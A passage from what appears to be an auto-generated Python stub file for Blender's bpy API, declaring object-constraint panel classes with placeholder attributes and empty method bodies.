def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def space_template(self, layout, con, target, owner, separator):
'''
'''
pass
def target_template(self, layout, con, subtargets):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class OBJECT_PT_bSameVolumeConstraint(ObjectConstraintPanel,
ConstraintButtonsPanel, bpy_types.Panel,
bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action(self, context):
'''
'''
pass
def draw_armature(self, context):
'''
'''
pass
def draw_camera_solver(self, context):
'''
'''
pass
def draw_childof(self, context):
'''
'''
pass
def draw_clamp_to(self, context):
'''
'''
pass
def draw_damp_track(self, context):
'''
'''
pass
def draw_dist_limit(self, context):
'''
'''
pass
def draw_follow_path(self, context):
'''
'''
pass
def draw_follow_track(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def draw_influence(self, layout, con):
'''
'''
pass
def draw_kinematic(self, context):
'''
'''
pass
def draw_loc_limit(self, context):
'''
'''
pass
def draw_locate_like(self, context):
'''
'''
pass
def draw_lock_track(self, context):
'''
'''
pass
def draw_min_max(self, context):
'''
'''
pass
def draw_object_solver(self, context):
'''
'''
pass
def draw_pivot(self, context):
'''
'''
pass
def draw_python_constraint(self, _context):
'''
'''
pass
def draw_rot_limit(self, context):
'''
'''
pass
def draw_rotate_like(self, context):
'''
'''
pass
def draw_same_volume(self, context):
'''
'''
pass
def draw_shrinkwrap(self, context):
'''
'''
pass
def draw_size_like(self, context):
'''
'''
pass
def draw_size_limit(self, context):
'''
'''
pass
def draw_spline_ik(self, context):
'''
'''
pass
def draw_stretch_to(self, context):
'''
'''
pass
def draw_trackto(self, context):
'''
'''
pass
def draw_trans_like(self, context):
'''
'''
pass
def draw_transform(self, context):
'''
'''
pass
def draw_transform_cache(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def space_template(self, layout, con, target, owner, separator):
'''
'''
pass
def target_template(self, layout, con, subtargets):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class OBJECT_PT_bShrinkwrapConstraint(ObjectConstraintPanel,
ConstraintButtonsPanel, bpy_types.Panel,
bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action(self, context):
'''
'''
pass
def draw_armature(self, context):
'''
'''
pass
def draw_camera_solver(self, context):
'''
'''
pass
def draw_childof(self, context):
'''
'''
pass
def draw_clamp_to(self, context):
'''
'''
pass
def draw_damp_track(self, context):
'''
'''
pass
def draw_dist_limit(self, context):
'''
'''
pass
def draw_follow_path(self, context):
'''
'''
pass
def draw_follow_track(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def draw_influence(self, layout, con):
'''
'''
pass
def draw_kinematic(self, context):
'''
'''
pass
def draw_loc_limit(self, context):
'''
'''
pass
def draw_locate_like(self, context):
'''
'''
pass
def draw_lock_track(self, context):
'''
'''
pass
def draw_min_max(self, context):
'''
'''
pass
def draw_object_solver(self, context):
'''
'''
pass
def draw_pivot(self, context):
'''
'''
pass
def draw_python_constraint(self, _context):
'''
'''
pass
def draw_rot_limit(self, context):
'''
'''
pass
def draw_rotate_like(self, context):
'''
'''
pass
def draw_same_volume(self, context):
'''
'''
pass
def draw_shrinkwrap(self, context):
'''
'''
pass
def draw_size_like(self, context):
'''
'''
pass
def draw_size_limit(self, context):
'''
'''
pass
def draw_spline_ik(self, context):
'''
'''
pass
def draw_stretch_to(self, context):
'''
'''
pass
def draw_trackto(self, context):
'''
'''
pass
def draw_trans_like(self, context):
'''
'''
pass
def draw_transform(self, context):
'''
'''
pass
def draw_transform_cache(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def space_template(self, layout, con, target, owner, separator):
'''
'''
pass
def target_template(self, layout, con, subtargets):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class OBJECT_PT_bSizeLikeConstraint(ObjectConstraintPanel,
ConstraintButtonsPanel, bpy_types.Panel,
bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action(self, context):
'''
'''
pass
def draw_armature(self, context):
'''
'''
pass
def draw_camera_solver(self, context):
'''
'''
pass
def draw_childof(self, context):
'''
'''
pass
def draw_clamp_to(self, context):
'''
'''
pass
def draw_damp_track(self, context):
'''
'''
pass
def draw_dist_limit(self, context):
'''
'''
pass
def draw_follow_path(self, context):
'''
'''
pass
def draw_follow_track(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def draw_influence(self, layout, con):
'''
'''
pass
def draw_kinematic(self, context):
'''
'''
pass
def draw_loc_limit(self, context):
'''
'''
pass
def draw_locate_like(self, context):
'''
'''
pass
def draw_lock_track(self, context):
'''
'''
pass
def draw_min_max(self, context):
'''
'''
pass
def draw_object_solver(self, context):
'''
'''
pass
def draw_pivot(self, context):
'''
'''
pass
def draw_python_constraint(self, _context):
'''
'''
pass
def draw_rot_limit(self, context):
'''
'''
pass
def draw_rotate_like(self, context):
'''
'''
pass
def draw_same_volume(self, context):
'''
'''
pass
def draw_shrinkwrap(self, context):
'''
'''
pass
def draw_size_like(self, context):
'''
'''
pass
def draw_size_limit(self, context):
'''
'''
pass
def draw_spline_ik(self, context):
'''
'''
pass
def draw_stretch_to(self, context):
'''
'''
pass
def draw_trackto(self, context):
'''
'''
pass
def draw_trans_like(self, context):
'''
'''
pass
def draw_transform(self, context):
'''
'''
pass
def draw_transform_cache(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def space_template(self, layout, con, target, owner, separator):
'''
'''
pass
def target_template(self, layout, con, subtargets):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class OBJECT_PT_bSizeLimitConstraint(ObjectConstraintPanel,
ConstraintButtonsPanel, bpy_types.Panel,
bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action(self, context):
'''
'''
pass
def draw_armature(self, context):
'''
'''
pass
def draw_camera_solver(self, context):
'''
'''
pass
def draw_childof(self, context):
'''
'''
pass
def draw_clamp_to(self, context):
'''
'''
pass
def draw_damp_track(self, context):
'''
'''
pass
def draw_dist_limit(self, context):
'''
'''
pass
def draw_follow_path(self, context):
'''
'''
pass
def draw_follow_track(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def draw_influence(self, layout, con):
'''
'''
pass
def draw_kinematic(self, context):
'''
'''
pass
def draw_loc_limit(self, context):
'''
'''
pass
def draw_locate_like(self, context):
'''
'''
pass
def draw_lock_track(self, context):
'''
'''
pass
def draw_min_max(self, context):
'''
'''
pass
def draw_object_solver(self, context):
'''
'''
pass
def draw_pivot(self, context):
'''
'''
pass
def draw_python_constraint(self, _context):
'''
'''
pass
def draw_rot_limit(self, context):
'''
'''
pass
def draw_rotate_like(self, context):
'''
'''
pass
def draw_same_volume(self, context):
'''
'''
pass
def draw_shrinkwrap(self, context):
'''
'''
pass
def draw_size_like(self, context):
'''
'''
pass
def draw_size_limit(self, context):
'''
'''
pass
def draw_spline_ik(self, context):
'''
'''
pass
def draw_stretch_to(self, context):
'''
'''
pass
def draw_trackto(self, context):
'''
'''
pass
def draw_trans_like(self, context):
'''
'''
pass
def draw_transform(self, context):
'''
'''
pass
def draw_transform_cache(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def space_template(self, layout, con, target, owner, separator):
'''
'''
pass
def target_template(self, layout, con, subtargets):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class OBJECT_PT_bStretchToConstraint(ObjectConstraintPanel,
ConstraintButtonsPanel, bpy_types.Panel,
bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action(self, context):
'''
'''
pass
def draw_armature(self, context):
'''
'''
pass
def draw_camera_solver(self, context):
'''
'''
pass
def draw_childof(self, context):
'''
'''
pass
def draw_clamp_to(self, context):
'''
'''
pass
def draw_damp_track(self, context):
'''
'''
pass
def draw_dist_limit(self, context):
'''
'''
pass
def draw_follow_path(self, context):
'''
'''
pass
def draw_follow_track(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def draw_influence(self, layout, con):
'''
'''
pass
def draw_kinematic(self, context):
'''
'''
pass
def draw_loc_limit(self, context):
'''
'''
pass
def draw_locate_like(self, context):
'''
'''
pass
def draw_lock_track(self, context):
'''
'''
pass
def draw_min_max(self, context):
'''
'''
pass
def draw_object_solver(self, context):
'''
'''
pass
def draw_pivot(self, context):
'''
'''
pass
def draw_python_constraint(self, _context):
'''
'''
pass
def draw_rot_limit(self, context):
'''
'''
pass
def draw_rotate_like(self, context):
'''
'''
pass
def draw_same_volume(self, context):
'''
'''
pass
def draw_shrinkwrap(self, context):
'''
'''
pass
def draw_size_like(self, context):
'''
'''
pass
def draw_size_limit(self, context):
'''
'''
pass
def draw_spline_ik(self, context):
'''
'''
pass
def draw_stretch_to(self, context):
'''
'''
pass
def draw_trackto(self, context):
'''
'''
pass
def draw_trans_like(self, context):
'''
'''
pass
def draw_transform(self, context):
'''
'''
pass
def draw_transform_cache(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def space_template(self, layout, con, target, owner, separator):
'''
'''
pass
def target_template(self, layout, con, subtargets):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class OBJECT_PT_bTrackToConstraint(ObjectConstraintPanel,
ConstraintButtonsPanel, bpy_types.Panel,
bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action(self, context):
'''
'''
pass
def draw_armature(self, context):
'''
'''
pass
def draw_camera_solver(self, context):
'''
'''
pass
def draw_childof(self, context):
'''
'''
pass
def draw_clamp_to(self, context):
'''
'''
pass
def draw_damp_track(self, context):
'''
'''
pass
def draw_dist_limit(self, context):
'''
'''
pass
def draw_follow_path(self, context):
'''
'''
pass
def draw_follow_track(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def draw_influence(self, layout, con):
'''
'''
pass
def draw_kinematic(self, context):
'''
'''
pass
def draw_loc_limit(self, context):
'''
'''
pass
def draw_locate_like(self, context):
'''
'''
pass
def draw_lock_track(self, context):
'''
'''
pass
def draw_min_max(self, context):
'''
'''
pass
def draw_object_solver(self, context):
'''
'''
pass
def draw_pivot(self, context):
'''
'''
pass
def draw_python_constraint(self, _context):
'''
'''
pass
def draw_rot_limit(self, context):
'''
'''
pass
def draw_rotate_like(self, context):
'''
'''
pass
def draw_same_volume(self, context):
'''
'''
pass
def draw_shrinkwrap(self, context):
'''
'''
pass
def draw_size_like(self, context):
'''
'''
pass
def draw_size_limit(self, context):
'''
'''
pass
def draw_spline_ik(self, context):
'''
'''
pass
def draw_stretch_to(self, context):
'''
'''
pass
def draw_trackto(self, context):
'''
'''
pass
def draw_trans_like(self, context):
'''
'''
pass
def draw_transform(self, context):
'''
'''
pass
def draw_transform_cache(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def space_template(self, layout, con, target, owner, separator):
'''
'''
pass
def target_template(self, layout, con, subtargets):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class OBJECT_PT_bTransLikeConstraint(ObjectConstraintPanel,
ConstraintButtonsPanel, bpy_types.Panel,
bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action(self, context):
'''
'''
pass
def draw_armature(self, context):
'''
'''
pass
def draw_camera_solver(self, context):
'''
'''
pass
def draw_childof(self, context):
'''
'''
pass
def draw_clamp_to(self, context):
'''
'''
pass
def draw_damp_track(self, context):
'''
'''
pass
def draw_dist_limit(self, context):
'''
'''
pass
def draw_follow_path(self, context):
'''
'''
pass
def draw_follow_track(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def draw_influence(self, layout, con):
'''
'''
pass
def draw_kinematic(self, context):
'''
'''
pass
def draw_loc_limit(self, context):
'''
'''
pass
def draw_locate_like(self, context):
'''
'''
pass
def draw_lock_track(self, context):
'''
'''
pass
def draw_min_max(self, context):
'''
'''
pass
def draw_object_solver(self, context):
'''
'''
pass
def draw_pivot(self, context):
'''
'''
pass
def draw_python_constraint(self, _context):
'''
'''
pass
def draw_rot_limit(self, context):
'''
'''
pass
def draw_rotate_like(self, context):
'''
'''
pass
def draw_same_volume(self, context):
'''
'''
pass
def draw_shrinkwrap(self, context):
'''
'''
pass
def draw_size_like(self, context):
'''
'''
pass
def draw_size_limit(self, context):
'''
'''
pass
def draw_spline_ik(self, context):
'''
'''
pass
def draw_stretch_to(self, context):
'''
'''
pass
def draw_trackto(self, context):
'''
'''
pass
def draw_trans_like(self, context):
'''
'''
pass
def draw_transform(self, context):
'''
'''
pass
def draw_transform_cache(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def space_template(self, layout, con, target, owner, separator):
'''
'''
pass
def target_template(self, layout, con, subtargets):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class OBJECT_PT_bTransformCacheConstraint(
ObjectConstraintPanel, ConstraintButtonsPanel, bpy_types.Panel,
bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action(self, context):
'''
'''
pass
def draw_armature(self, context):
'''
'''
pass
def draw_camera_solver(self, context):
'''
'''
pass
def draw_childof(self, context):
'''
'''
pass
def draw_clamp_to(self, context):
'''
'''
pass
def draw_damp_track(self, context):
'''
'''
pass
def draw_dist_limit(self, context):
'''
'''
pass
def draw_follow_path(self, context):
'''
'''
pass
def draw_follow_track(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def draw_influence(self, layout, con):
'''
'''
pass
def draw_kinematic(self, context):
'''
'''
pass
def draw_loc_limit(self, context):
'''
'''
pass
def draw_locate_like(self, context):
'''
'''
pass
def draw_lock_track(self, context):
'''
'''
pass
def draw_min_max(self, context):
'''
'''
pass
def draw_object_solver(self, context):
'''
'''
pass
def draw_pivot(self, context):
'''
'''
pass
def draw_python_constraint(self, _context):
'''
'''
pass
def draw_rot_limit(self, context):
'''
'''
pass
def draw_rotate_like(self, context):
'''
'''
pass
def draw_same_volume(self, context):
'''
'''
pass
def draw_shrinkwrap(self, context):
'''
'''
pass
def draw_size_like(self, context):
'''
'''
pass
def draw_size_limit(self, context):
'''
'''
pass
def draw_spline_ik(self, context):
'''
'''
pass
def draw_stretch_to(self, context):
'''
'''
pass
def draw_trackto(self, context):
'''
'''
pass
def draw_trans_like(self, context):
'''
'''
pass
def draw_transform(self, context):
'''
'''
pass
def draw_transform_cache(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def space_template(self, layout, con, target, owner, separator):
'''
'''
pass
def target_template(self, layout, con, subtargets):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class OBJECT_PT_bTransformConstraint(ObjectConstraintPanel,
ConstraintButtonsPanel, bpy_types.Panel,
bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action(self, context):
'''
'''
pass
def draw_armature(self, context):
'''
'''
pass
def draw_camera_solver(self, context):
'''
'''
pass
def draw_childof(self, context):
'''
'''
pass
def draw_clamp_to(self, context):
'''
'''
pass
def draw_damp_track(self, context):
'''
'''
pass
def draw_dist_limit(self, context):
'''
'''
pass
def draw_follow_path(self, context):
'''
'''
pass
def draw_follow_track(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def draw_influence(self, layout, con):
'''
'''
pass
def draw_kinematic(self, context):
'''
'''
pass
def draw_loc_limit(self, context):
'''
'''
pass
def draw_locate_like(self, context):
'''
'''
pass
def draw_lock_track(self, context):
'''
'''
pass
def draw_min_max(self, context):
'''
'''
pass
def draw_object_solver(self, context):
'''
'''
pass
def draw_pivot(self, context):
'''
'''
pass
def draw_python_constraint(self, _context):
'''
'''
pass
def draw_rot_limit(self, context):
'''
'''
pass
def draw_rotate_like(self, context):
'''
'''
pass
def draw_same_volume(self, context):
'''
'''
pass
def draw_shrinkwrap(self, context):
'''
'''
pass
def draw_size_like(self, context):
'''
'''
pass
def draw_size_limit(self, context):
'''
'''
pass
def draw_spline_ik(self, context):
'''
'''
pass
def draw_stretch_to(self, context):
'''
'''
pass
def draw_trackto(self, context):
'''
'''
pass
def draw_trans_like(self, context):
'''
'''
pass
def draw_transform(self, context):
'''
'''
pass
def draw_transform_cache(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def space_template(self, layout, con, target, owner, separator):
'''
'''
pass
def target_template(self, layout, con, subtargets):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class OBJECT_PT_bTransformConstraint_destination(
ObjectConstraintPanel, ConstraintButtonsSubPanel, bpy_types.Panel,
bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_parent_id = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action_action(self, context):
'''
'''
pass
def draw_action_target(self, context):
'''
'''
pass
def draw_armature_bones(self, context):
'''
'''
pass
def draw_spline_ik_chain_scaling(self, context):
'''
'''
pass
def draw_spline_ik_fitting(self, context):
'''
'''
pass
def draw_transform_from(self, context):
'''
'''
pass
def draw_transform_to(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class OBJECT_PT_bTransformConstraint_source(
ObjectConstraintPanel, ConstraintButtonsSubPanel, bpy_types.Panel,
bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_parent_id = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action_action(self, context):
'''
'''
pass
def draw_action_target(self, context):
'''
'''
pass
def draw_armature_bones(self, context):
'''
'''
pass
def draw_spline_ik_chain_scaling(self, context):
'''
'''
pass
def draw_spline_ik_fitting(self, context):
'''
'''
pass
def draw_transform_from(self, context):
'''
'''
pass
def draw_transform_to(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
